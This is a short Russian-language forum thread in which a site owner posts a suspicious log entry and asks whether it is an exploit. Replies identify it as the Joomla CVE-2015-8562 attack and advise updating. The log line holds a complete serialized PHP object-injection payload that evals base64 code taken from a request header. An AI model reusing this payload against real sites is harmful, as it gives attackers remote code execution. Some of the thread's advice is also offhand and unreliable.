В логах всплыла такая строчка IP: 31.173.226.6 User Agent: gILMC}__BPrXyydvjI|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:71:"eval(base64_decode($_SERVER['HTTP_HGSEK']));JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}󓲑 NO REFERER 2016-11-01 16:26:25 Не пойму это эксплойт какойто или что? Сидеть спокойно или заморочиться c защитой?
это похоже на свежий баг сериализации, которым порнхаб хакнули, ну пыху обнови и не парься а может и бекдор где то валяется в коде
а ёп это джумла https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8562 https://www.exploit-db.com/exploits/38977/ обновить джумлу или забить если её нет вовсе